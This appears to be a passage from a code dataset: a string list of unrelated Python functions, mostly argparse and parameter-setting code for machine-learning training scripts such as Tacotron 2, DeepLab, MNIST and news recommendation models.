= 'true' == scaler_args.pop('scale_hashed').lower()\n \n if 'scale_vectors' in scaler_args:\n self.model.scale_vectors = 'true' == scaler_args.pop('scale_vectors').lower()\n \n # Get the rest of the scaler parameters, converting values to the correct data type\n self.model.scaler_kwargs = utils.get_kwargs_by_type(scaler_args) \n else:\n err = \"Arguments for scaling did not include the scaler name e.g StandardScaler\"\n raise Exception(err)\n \n # If the estimator key word arguments were included in the request, get the parameters and values\n if len(estimator_args) > 0:\n \n # Transform the string of arguments into a dictionary\n estimator_args = utils.get_kwargs(estimator_args)\n \n # Set estimator arguments that will be used when preprocessing the data\n # The parameters available will depend on the selected estimator\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'estimator' in estimator_args:\n self.model.estimator = estimator_args.pop('estimator')\n \n # Set the estimator type for the model\n if self.model.estimator in self.classifiers:\n self.model.estimator_type = \"classifier\"\n elif self.model.estimator in self.regressors:\n self.model.estimator_type = \"regressor\"\n elif self.model.estimator in self.decomposers:\n self.model.estimator_type = \"decomposer\"\n elif self.model.estimator in self.clusterers:\n self.model.estimator_type = \"clusterer\"\n else:\n err = \"Unknown estimator class: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n # Get the rest of the estimator parameters, converting values to the correct data type\n self.model.estimator_kwargs = utils.get_kwargs_by_type(estimator_args) \n else:\n err = \"Arguments for estimator did not include the estimator class e.g. RandomForestClassifier\"\n raise Exception(err)\n \n # If key word arguments for model evaluation metrics are included in the request, get the parameters and values\n if metric_args is not None and len(metric_args) > 0:\n # Transform the string of arguments into a dictionary\n metric_args = utils.get_kwargs(metric_args)\n \n # Get the metric parameters, converting values to the correct data type\n self.model.metric_args = utils.get_kwargs_by_type(metric_args) \n \n # If key word arguments for dimensionality reduction are included in the request, get the parameters and values\n if dim_reduction_args is not None and len(dim_reduction_args) > 0:\n # Transform the string of arguments into a dictionary\n dim_reduction_args = utils.get_kwargs(dim_reduction_args)\n \n # Set dim_reduction arguments that will be used after preprocessing the data\n # The parameters available will depend on the selected dimensionality reduction method\n # Acceptable classes are PCA, KernelPCA, IncrementalPCA, TruncatedSVD\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'reduction' in dim_reduction_args:\n self.model.reduction = dim_reduction_args.pop('reduction')\n \n # Get the rest of the dim_reduction parameters, converting values to the correct data type\n self.model.dim_reduction_args = utils.get_kwargs_by_type(dim_reduction_args) \n else:\n err = \"Arguments for dimensionality reduction did not include the class e.g. PCA\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(2)", "def parse_arguments():\n parser = argparse.ArgumentParser()\n _files = training_file()\n parser.add_argument('--img_width',\n type=int,\n default=128,\n help='Input image width')\n parser.add_argument('--second_phase_width',\n type=int,\n default=256,\n help='Input image width for second phase of training')\n parser.add_argument('--third_phase_width',\n type=int,\n default=512,\n help='Input image width for second phase of training')\n parser.add_argument('--start_epoch',\n type=int,\n default=0,\n help='Training start epoch')\n parser.add_argument('--stop_epoch',\n type=int,\n default=6,\n help='Training stop epoch')\n parser.add_argument('--stop_second_phase',\n type=int,\n default=20,\n help='Training stop epoch for second phase')\n parser.add_argument('--stop_third_phase',\n type=int,\n default=25,\n help='Training stop epoch for third phase')\n parser.add_argument('--run_name',\n type=str,\n default=datetime.datetime.now().strftime('%Y:%m:%d:%H:%M:%S'),\n help='Training run name')\n parser.add_argument('--fonts',\n action='append',\n type=str,\n help='Fonts for training')\n parser.add_argument('--major_font',\n type=str,\n help='Major font to use')\n parser.add_argument('--data_dir',\n type=str,\n default=_files.data_dir,\n help='Data directory')\n parser.add_argument('--model_dir',\n type=str,\n default=_files.model_dir,\n help='Model directory')\n parser.add_argument('--not_save_model',\n dest='save_model',\n action='store_false',\n help='Saves network model to yaml file.')\n (args, _) = parser.parse_known_args()\n global flag_args\n flag_args = args\n \n return args", "def add_args(parser):\n # fmt: off\n parser.add_argument(\"--hidden-size\", type=int, default=512)\n parser.add_argument(\"--max-epochs\", type=int, default=1000)\n parser.add_argument(\"--sample-size\", type=int, default=500)\n parser.add_argument(\"--batch-size\", type=int, default=4)\n # fmt: on", "def __init__(self, *args, **kwargs):\n self._observation_space = kwargs['observation_space']\n self._action_space = kwargs['action_space']\n self._seed = kwargs['seed']\n self._lr = kwargs['lr']\n self._gamma = kwargs['gamma']\n self._batch_size = kwargs['batch_size']\n\n if self._seed:\n from drl.tools.misc_util import set_seeds\n set_seeds(self._seed)\n\n #TODO:OpenAI baselines has helpers for the observation inputs..\n # this time we go ham on the class, but this could be made automatically\n #here", "def __init__(self):\n self.args = self._prepare_args(locals())\n self.requires_full_dataset_in_memory = False", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def add_args(parser):\n # fmt: off\n # todo 先不管这些, 我们后续一个个改成对应的\n parser.add_argument('--embed-dim', type=int, metavar='N',\n help='embedding dimension')\n parser.add_argument('--num-attention-heads', type=int, metavar='N',\n help='num attention heads')\n parser.add_argument('--num-layers', type=int, metavar='N',\n help='num layers')\n parser.add_argument('--dropout', type=float, metavar='D',\n help='dropout probability for all fully connected layers '\n 'in the embeddings, encoder, and pooler')\n parser.add_argument('--attention-dropout', type=float, metavar='D',\n help='dropout probability for attention weights')\n\n parser.add_argument('--max-positions', type=int,\n help='number of positional embeddings to learn')\n\n parser.add_argument('--load-hf-bert-from', type=str, default='',\n help='load huggingface pretrained bert from path')\n\n parser.add_argument('--load-hf-bert-config-only', action='store_true',\n help='only load config in the path so we can get a hf model')\n\n parser.add_argument('--quant-noise-pq', type=float, metavar='D', default=0,\n help='iterative PQ quantization noise at training time')\n parser.add_argument('--quant-noise-pq-block-size', type=int, metavar='D', default=8,\n help='block size of quantization noise at training time')\n parser.add_argument('--quant-noise-scalar', type=float, metavar='D', default=0,\n help='scalar quantization noise and scalar quantization at training time')\n # fmt: on", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Generate embedding data for training an urban sound classification model')\n\n parser.add_argument('-e',\n '--num-epochs',\n dest='num_epochs',\n action='store',\n type=int,\n default=150,\n help='(MLP) Maximum number of training epochs')\n\n parser.add_argument('-tbs',\n '--train-batch-size',\n dest='train_batch_size',\n action='store',\n type=int,\n default=64,\n help='(MLP) Number of training examples per batch')\n\n parser.add_argument('-eap',\n '--early-stopping-patience',\n dest='patience',\n action='store',\n type=int,\n default=20,\n help='(MLP) Patience for early stopping')\n\n parser.add_argument('-ps',\n '--parameter-search',\n dest='parameter_search',\n action='store_true',\n help='If True, parameter search will be run')\n\n parser.add_argument('-psnv',\n '--parameter-search-no-valid-fold',\n dest='parameter_search_valid_fold',\n action='store_false',\n help='If True, include validation set in train set and instead get the validation set as a ratio of the training set')\n\n parser.add_argument('-psvr',\n '--parameter-search-valid-ratio',\n dest='parameter_search_valid_ratio',\n action='store',\n type=float,\n default=0.15,\n help='If no validation fold is used, the ratio of the extended training set to set aside for validation')\n\n parser.add_argument('-pstwv',\n '--parameter-search-train-without-valid',\n dest='parameter_search_train_with_valid',\n action='store_false',\n help='If set, do not retrain with validation set')\n\n parser.add_argument('-lr',\n '--learning-rate',\n dest='learning_rate',\n action='store',\n type=float,\n default=1e-4,\n help='(MLP) Optimization learning rate')\n\n parser.add_argument('-wd',\n '--weight-decay',\n dest='weight_decay',\n action='store',\n type=float,\n default=1e-5,\n help='(MLP) L2 regularization penalty factor')\n\n parser.add_argument('-npf',\n '--norm-penalty-factor',\n dest='C',\n action='store',\n type=float,\n default=1.0,\n help='(SVM) norm penalization factor')\n\n parser.add_argument('-sct',\n '--svm-conv-tolerance',\n dest='tol',\n action='store',\n type=float,\n default=0.00001,\n help='(SVM) convergence tolerance threshold')\n\n parser.add_argument('-smi',\n '--svm-max-iterations',\n dest='max_iterations',\n action='store',\n type=int,\n default=-1,\n help='(SVM) maximum iterations')\n\n parser.add_argument('-skt',\n '--svm-kernel-type',\n dest='kernel',\n action='store',\n type=str,\n default='rbf',\n choices=['rbf', 'sigmoid', 'linear', 'poly'],\n help='(SVM) kernel type')\n\n parser.add_argument('-rfne',\n '--rf-num-estimators',\n dest='n_estimators',\n action='store',\n type=int,\n default=100,\n help='(RF) Number of decision trees in the random forest')\n\n parser.add_argument('-gsid',\n '--gsheet-id',\n dest='gsheet_id',\n type=str,\n help='Google Spreadsheet ID for centralized logging of experiments')\n\n parser.add_argument('-gdan',\n '--google-dev-app-name',\n dest='google_dev_app_name',\n type=str,\n help='Google Developer Application Name for using API')\n\n parser.add_argument('-r',\n '--random-state',\n dest='random_state',\n action='store',\n type=int,\n default=20171021,\n help='Random seed used to set the RNG state')\n\n parser.add_argument('-v',\n '--verbose',\n dest='verbose',\n action='store_true',\n default=False,\n help='If True, print detailed messages')\n\n parser.add_argument('-fm',\n '--feature-mode',\n dest='feature_mode',\n action='store',\n type=str,\n default='framewise',\n choices=['framewise', 'stats'],\n help='Type of inputs used for model')\n\n parser.add_argument('-mt',\n '--model-type',\n dest='model_type',\n action='store',\n type=str,\n default='svm',\n choices=['svm', 'mlp', 'rf'],\n help='Type of model used for training classifier')\n\n parser.add_argument('-no',\n '--non-overlap',\n dest='non_overlap',\n action='store_true',\n default=False)\n\n parser.add_argument('-nocs',\n '--non-overlap-chunk-size',\n dest='non_overlap_chunk_size',\n action='store',\n default=10)\n\n parser.add_argument('-umm',\n '--use-min-max',\n dest='use_min_max',\n action='store_true',\n default=False)\n\n parser.add_argument('features_dir',\n action='store',\n type=str,\n help='Path to directory where feature files are stored')\n\n parser.add_argument('output_dir',\n action='store',\n type=str,\n help='Path to directory where output files will be stored')\n\n parser.add_argument('fold_num',\n action='store',\n type=int,\n help='Fold ordinal to train/test with')\n\n return vars(parser.parse_args())", "def define_and_process_args():\n\n description = main.__doc__\n formatter_class = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--data_dir', default='~/Data/JIGSAWS/Suturing',\n help='Data directory.')\n parser.add_argument('--data_filename', default='standardized_data.pkl',\n help='''The name of the standardized-data pkl file that\n resides in data_dir.''')\n parser.add_argument('--test_users', default='B',\n help='''A string of the users that make up the test set,\n with users separated by spaces.''')\n\n parser.add_argument('--model_type', default='BidirectionalLSTM',\n help='''The model type, either BidirectionalLSTM,\n ForwardLSTM, or ReverseLSTM.''')\n parser.add_argument('--num_layers', type=int, default=1,\n help='The number of hidden layers.')\n parser.add_argument('--hidden_layer_size', type=int, default=1024,\n help='The number of hidden units per layer.')\n parser.add_argument('--dropout_keep_prob', type=float, default=0.5,\n help='''The fraction of inputs to keep whenever dropout\n is applied.''')\n\n parser.add_argument('--batch_size', type=int, default=5,\n help='The number of sequences in a batch/sweep.')\n parser.add_argument('--num_train_sweeps', type=int, default=600,\n help='''The number of training sweeps. A sweep\n is a collection of batch_size sequences that\n continue together throughout time until all\n sequences in the batch are exhausted. Short\n sequences grow by being wrapped around in\n time.''')\n parser.add_argument('--initial_learning_rate', type=float, default=1.0,\n help='The initial learning rate.')\n parser.add_argument('--num_initial_sweeps', type=int, default=300,\n help='''The number of initial sweeps before the\n learning rate begins to decay.''')\n parser.add_argument('--num_sweeps_per_decay', type=int, default=50,\n help='''The number of sweeps per learning-rate decay,\n once decaying begins.''')\n parser.add_argument('--decay_factor', type=float, default=0.5,\n help='The multiplicative learning-rate-decay factor.')\n parser.add_argument('--max_global_grad_norm', type=float, default=1.0,\n help='''The global norm is the norm of all gradients\n when concatenated together. If this global norm\n exceeds max_global_grad_norm, then all gradients\n are rescaled so that the global norm becomes\n max_global_grad_norm.''')\n\n parser.add_argument('--init_scale', type=float, default=0.1,\n help='''All weights will be initialized using a\n uniform distribution over\n [-init_scale, init_scale].''')\n parser.add_argument('--num_sweeps_per_summary', type=int, default=7,\n help='''The number of sweeps between summaries. Note:\n 7 sweeps with 5 sequences per sweep corresponds\n to (more than) 35 visited sequences, which is\n approximately 1 epoch.''')\n parser.add_argument('--num_sweeps_per_save', type=int, default=7,\n help='The number of sweeps between saves.')\n\n args = parser.parse_args()\n args.data_dir = os.path.expanduser(args.data_dir)\n args.test_users = args.test_users.split(' ')\n return args", "def train(self, training_data, cfg, **kwargs):\n pass", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def load_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batchsize\",\n help=\"the batch size of the dataloader\",\n type=int,\n default=2,\n required=False)\n parser.add_argument(\"--validsize\",\n help=\"percentage that training set split into validation set\",\n type=float,\n default=1/6,\n required=False)\n parser.add_argument(\"--input-prefix\",\n help=\"file for saving the data (.gz file)\",\n type=str,\n default=\"../mnistPC\",\n required=False)\n parser.add_argument(\"--demo\",\n help=\"if demo is true, then only load small number of images\",\n type=bool,\n default=False,\n required=False)\n parser.add_argument(\"--test\",\n help=\"if test is true, then load data from test dataset\",\n type=bool,\n default=False,\n required=False)\n parser.add_argument(\"--epochs\",\n help=\"number of epochs\",\n type=int,\n default=5,\n required=False)\n parser.add_argument(\"--learning_rate\",\n help=\"learning rate of the model\",\n type=float,\n default=1e-2,\n required=False)\n parser.add_argument(\"--num_classes\",\n help=\"number of classes for classification\",\n type=int,\n default=10,\n required=False)\n parser.add_argument(\"--num_neighbors\",\n help=\"num of neighbors for the network\",\n type=int,\n default=15,\n required=False)\n parser.add_argument(\"--cudas\",\n help=\"cuda numbera to use, if use cpu, please enter -1\",\n type=str,\n default=\"0/1/2/3\",\n required=False)\n args = parser.parse_args()\n return args", "def setup_args(cls, parser):\n pass", "def add_arguments(parser):\r\n group = parser.add_argument_group(\"tacotron 2 model setting\")\r\n # encoder\r\n group.add_argument(\r\n \"--embed-dim\",\r\n default=512,\r\n type=int,\r\n help=\"Number of dimension of embedding\",\r\n )\r\n group.add_argument(\r\n \"--elayers\", default=1, type=int, help=\"Number of encoder layers\"\r\n )\r\n group.add_argument(\r\n \"--eunits\",\r\n \"-u\",\r\n default=512,\r\n type=int,\r\n help=\"Number of encoder hidden units\",\r\n )\r\n group.add_argument(\r\n \"--econv-layers\",\r\n default=3,\r\n type=int,\r\n help=\"Number of encoder convolution layers\",\r\n )\r\n group.add_argument(\r\n \"--econv-chans\",\r\n default=512,\r\n type=int,\r\n help=\"Number of encoder convolution channels\",\r\n )\r\n group.add_argument(\r\n \"--econv-filts\",\r\n default=5,\r\n type=int,\r\n help=\"Filter size of encoder convolution\",\r\n )\r\n # decoder\r\n group.add_argument(\r\n \"--dlayers\", default=2, type=int, help=\"Number of decoder layers\"\r\n )\r\n group.add_argument(\r\n \"--dunits\", default=1024, type=int, help=\"Number of decoder hidden units\"\r\n )\r\n group.add_argument(\r\n \"--prenet-layers\", default=2, type=int, help=\"Number of prenet layers\"\r\n )\r\n group.add_argument(\r\n \"--prenet-units\",\r\n default=256,\r\n type=int,\r\n help=\"Number of prenet hidden units\",\r\n )\r\n group.add_argument(\r\n \"--postnet-layers\", default=5, type=int, help=\"Number of postnet layers\"\r\n )\r\n group.add_argument(\r\n \"--postnet-chans\", default=512, type=int, help=\"Number of postnet channels\"\r\n )\r\n group.add_argument(\r\n \"--postnet-filts\", default=5, type=int, help=\"Filter size of postnet\"\r\n )\r\n group.add_argument(\r\n \"--output-activation\",\r\n default=None,\r\n type=str,\r\n nargs=\"?\",\r\n help=\"Output activation function\",\r\n )\r\n # model (parameter) related\r\n group.add_argument(\r\n \"--use-batch-norm\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to use batch normalization\",\r\n )\r\n group.add_argument(\r\n \"--use-concate\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to concatenate encoder embedding with decoder outputs\",\r\n )\r\n group.add_argument(\r\n \"--use-residual\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to use residual connection in conv layer\",\r\n )\r\n group.add_argument(\r\n \"--dropout-rate\", default=0.5, type=float, help=\"Dropout rate\"\r\n )\r\n group.add_argument(\r\n \"--zoneout-rate\", default=0.1, type=float, help=\"Zoneout rate\"\r\n )\r\n group.add_argument(\r\n \"--reduction-factor\", default=1, type=int, help=\"Reduction factor\"\r\n )\r\n group.add_argument(\r\n \"--spk-embed-dim\",\r\n default=None,\r\n type=int,\r\n help=\"Number of speaker embedding dimensions\",\r\n )\r\n group.add_argument(\r\n \"--spc-dim\", default=None, type=int, help=\"Number of spectrogram dimensions\"\r\n )\r\n group.add_argument(\r\n \"--pretrained-model\", default=None, type=str, help=\"Pretrained model path\"\r\n )\r\n # loss related\r\n group.add_argument(\r\n \"--use-masking\",\r\n default=False,\r\n type=strtobool,\r\n help=\"Whether to use masking in calculation of loss\",\r\n )\r\n group.add_argument(\r\n \"--use-weighted-masking\",\r\n default=False,\r\n type=strtobool,\r\n help=\"Whether to use weighted masking in calculation of loss\",\r\n )\r\n # duration predictor settings\r\n group.add_argument(\r\n \"--duration-predictor-layers\",\r\n default=2,\r\n type=int,\r\n help=\"Number of layers in duration predictor\",\r\n )\r\n group.add_argument(\r\n \"--duration-predictor-chans\",\r\n default=384,\r\n type=int,\r\n help=\"Number of channels in duration predictor\",\r\n )\r\n group.add_argument(\r\n \"--duration-predictor-kernel-size\",\r\n default=3,\r\n type=int,\r\n help=\"Kernel size in duration predictor\",\r\n )\r\n group.add_argument(\r\n \"--duration-predictor-dropout-rate\",\r\n default=0.1,\r\n type=float,\r\n help=\"Dropout rate for duration predictor\",\r\n )\r\n return parser", "def add_models_args(parser):\r\n # Some common arguments for your convenience\r\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\r\n parser.add_argument('--epochs', type=int, default=10, help='num epochs to train for')\r\n parser.add_argument('--lr', type=float, default=1e-3)\r\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\r\n\r\n # 65 is all you need for GeoQuery\r\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\r\n\r\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\r\n # 50-200 might be a good range to start with for embedding and LSTM sizes\r", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. \"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def training_step(self, **kwargs):\n raise NotImplementedError", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--ori_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ori.pt'),\n help='source training data location.'\n )\n parser.add_argument(\n '--ref_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ref.pt'),\n help='reference training data location.'\n )\n parser.add_argument(\n '--dict_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_dict.pt'),\n help='token to index dictionary save location.'\n )\n parser.add_argument(\n '--epoch', type=int, default=20, help='number of training epochs'\n )\n parser.add_argument(\n '--lr', type=float, default=2.0, help='learning rate scale factor'\n )\n parser.add_argument(\n '--batch_size', type=int, default=128, help='batch size'\n )\n parser.add_argument(\n '--d_model', type=int, default=256, help='model dimension'\n )\n parser.add_argument(\n '--d_inner', type=int, default=1024, help='inner dimension'\n )\n parser.add_argument(\n '--d_k', type=int, default=64, help='dimension of key and query'\n )\n parser.add_argument(\n '--d_v', type=int, default=64, help='dimension of value'\n )\n parser.add_argument(\n '--n_trf_txt_enc_layer', type=int, default=4, help='number of text Transformer encoder layers'\n )\n parser.add_argument(\n '--n_trf_syn_enc_layer', type=int, default=2, help='number of syntax Transformer encoder layers'\n )\n parser.add_argument(\n '--n_trf_dec_layer', type=int, default=6, help='number of Transformer decoder layers'\n )\n parser.add_argument(\n '--n_txt_attn_head', type=int, default=4, help='number of text encoder attention heads'\n )\n parser.add_argument(\n '--n_syn_attn_head', type=int, default=2, help='number of syntax encoder attention heads'\n )\n parser.add_argument(\n '--dropout', type=float, default=0.1, help='dropout ratio'\n )\n parser.add_argument(\n '--tgt_emb_prj_weight_sharing', action='store_true',\n help='whether share weights between embedding and projection layers'\n )\n parser.add_argument(\n '--log', type=str, default=os.path.join('logs', 'LogFile'), help='log filepath to save'\n )\n parser.add_argument(\n '--model_save', type=str, default=os.path.join('models', 'model'),\n help='the path of the model to save'\n )\n parser.add_argument(\n '--no_cuda', action='store_true', help='disable cuda'\n )\n parser.add_argument(\n '--label_smoothing', action='store_true', help='whether use label smoothing'\n )\n parser.add_argument(\n '--n_warmup_steps', type=int, default=12800, help='number of warm-up steps'\n )\n parser.add_argument(\n '--pin_memory', action='store_true', help='whether pin your cuda memory during training'\n )\n parser.add_argument(\n '--random_seed', type=int, default=42\n )\n\n args = parser.parse_args()\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n return args", "def set_training_params(use_defaults):\n if use_defaults:\n n_epochs, batch_size, epsilon = default_training_params()\n return n_epochs, batch_size, epsilon\n\n print (\"Select number of epochs to train (default 100):\")\n n_epochs = int(input())\n print (\"Select batch size (default 64):\")\n batch_size = int(input())\n print (\"Select learning rate (default 0.0001):\")\n epsilon = float(input())\n return n_epochs, batch_size, epsilon", "def fill_args(args):\n args.agent_module = 'dstar_sgolam_walker'\n args.checkpoint_path = None\n args.exp_config = 'configs/baselines/dstar_proto_sgolam.yaml'\n args.num_episodes = 25\n \n return args", "def process_args():\n\n parser = argparse.ArgumentParser(\n description='Runs MNIST Kubeflow Pipeline Sample E2E.')\n parser.add_argument(\n '--mode',\n default='all',\n help='execution mode, choose between eval, train, or all.'\n 'Default is all')\n parser.add_argument(\n '--output_path',\n default=None,\n help='output path for saving the output model file from'\n 'training step. same path is used to load the model from'\n 'for evaluation step' )\n parser.add_argument(\n '--epochs',\n default=5,\n help='number of epochs to run the training, default is 5.')\n args, _ = parser.parse_known_args()\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Resnet-deeplab train model.\")\n\n parser.add_argument(\n '--batch_size',\n type=int,\n default=2,\n help='The batch size of each iteration.')\n parser.add_argument(\n '--epoch_size', type=int, default=50, help='The epoch size of train.')\n parser.add_argument(\n '--print_step', type=int, default=50, help='The number of print step.')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='dataset',\n help='The directory of dataset')\n parser.add_argument(\n '--pretrain_model_path',\n type=str,\n default=os.path.join('pretrain_model', 'model.ckpt'),\n help='The path of pretrained model.')\n parser.add_argument(\n '--saved_model_dir',\n type=str,\n default=os.path.join('saved_model'),\n help='The path of saved model.')\n parser.add_argument(\n '--log_dir', type=str, default='logs', help='Directory of log.')\n parser.add_argument(\n '--num_classes',\n type=int,\n default=150,\n help='The number of class in the dataset.')\n parser.add_argument(\n '--input_size',\n type=str,\n default='512x512',\n help='The size of input image.')\n parser.add_argument(\n '--is_training',\n action='store_true',\n help=\n 'Whether to update the mean and variance in batch normalization layer.'\n )\n parser.add_argument(\n '--not_restore_fc',\n action='store_true',\n help='Whether to restore the last fully connected layer.')\n parser.add_argument(\n '--weight_decay',\n type=float,\n default='0.0005',\n help='Regularisation parameter for L2-loss.')\n parser.add_argument(\n '--lr', type=float, default='1e-4', help='The base learning rate.')\n parser.add_argument(\n '--power', type=float, default='0.8', help='Decay for learning rate.')\n parser.add_argument(\n '--momentum',\n type=float,\n default='0.9',\n help='Momentum component of the optimiser.')\n\n args = parser.parse_args()\n\n return args", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def get_args(phase):\r\n parser = argparse.ArgumentParser(description='Configuration')\r\n\r\n # Hardware specifications\r\n parser.add_argument('--seed', type=int, default=1, help='random seed')\r\n parser.add_argument(\"--device_id\", type=int, default=0, help=\"device id, default is 0.\")\r\n parser.add_argument('--device_num', type=int, default=1, help='device num, default is 1.')\r\n parser.add_argument('--platform', type=str, default=\"Ascend\", \\\r\n help='run platform, only support Ascend')\r\n parser.add_argument('--save_graphs', type=ast.literal_eval, default=False, \\\r\n help='whether save graphs, default is False.')\r\n parser.add_argument('--dataset', type=str, default=\"large\", choices=(\"large\", \"small\", \"demo\"), \\\r\n help='MIND dataset, support large, small and demo.')\r\n parser.add_argument('--dataset_path', type=str, default=None, help='MIND dataset path.')\r\n\r\n # Model specifications\r\n parser.add_argument('--n_browsed_news', type=int, default=50, help='number of browsed news per user')\r\n parser.add_argument('--n_words_title', type=int, default=16, help='number of words per title')\r\n parser.add_argument('--n_words_abstract', type=int, default=48, help='number of words per abstract')\r\n parser.add_argument('--word_embedding_dim', type=int, default=304, help='dimension of word embedding vector')\r\n parser.add_argument('--category_embedding_dim', type=int, default=112, \\\r\n help='dimension of category embedding vector')\r\n parser.add_argument('--query_vector_dim', type=int, default=208, help='dimension of the query vector in attention')\r\n parser.add_argument('--n_filters', type=int, default=400, help='number of filters in CNN')\r\n parser.add_argument('--window_size', type=int, default=3, help='size of filter in CNN')\r\n parser.add_argument(\"--checkpoint_path\", type=str, default=None, \\\r\n help=\"Pre trained checkpoint path, default is None.\")\r\n parser.add_argument('--batch_size', type=int, default=64, help='size of each batch')\r\n # Training specifications\r\n if phase == \"train\":\r\n parser.add_argument('--epochs', type=int, default=None, help='number of epochs for training')\r\n parser.add_argument('--lr', type=float, default=None, help='learning rate')\r\n parser.add_argument('--beta1', type=float, default=0.9, help='ADAM beta1')\r\n parser.add_argument('--beta2', type=float, default=0.999, help='ADAM beta2')\r\n parser.add_argument('--epsilon', type=float, default=1e-8, help='ADAM epsilon for numerical stability')\r\n parser.add_argument('--neg_sample', type=int, default=4, help='number of negative samples in negative sampling')\r\n parser.add_argument(\"--mixed\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use mixed precision, default is True.\")\r\n parser.add_argument(\"--sink_mode\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use dataset sink, default is True.\")\r\n parser.add_argument('--print_times', type=int, default=None, help='number of print times, default is None')\r\n parser.add_argument(\"--weight_decay\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use weight decay, default is True.\")\r\n parser.add_argument('--save_checkpoint', type=ast.literal_eval, default=True, \\\r\n help='whether save checkpoint, default is True.')\r\n parser.add_argument(\"--save_checkpoint_path\", type=str, default=\"./checkpoint\", \\\r\n help=\"Save checkpoint path, default is checkpoint.\")\r\n parser.add_argument('--dropout_ratio', type=float, default=0.2, help='ratio of dropout')\r\n if phase == \"eval\":\r\n parser.add_argument('--neg_sample', type=int, default=-1, \\\r\n help='number of negative samples in negative sampling')\r\n if phase == \"export\":\r\n parser.add_argument('--file_format', type=str, choices=[\"AIR\", \"ONNX\", \"MINDIR\"], default='AIR', \\\r\n help='file format')\r\n parser.add_argument('--neg_sample', type=int, default=-1, \\\r\n help='number of negative samples in negative sampling')\r\n args = parser.parse_args()\r\n if args.device_num > 1:\r\n 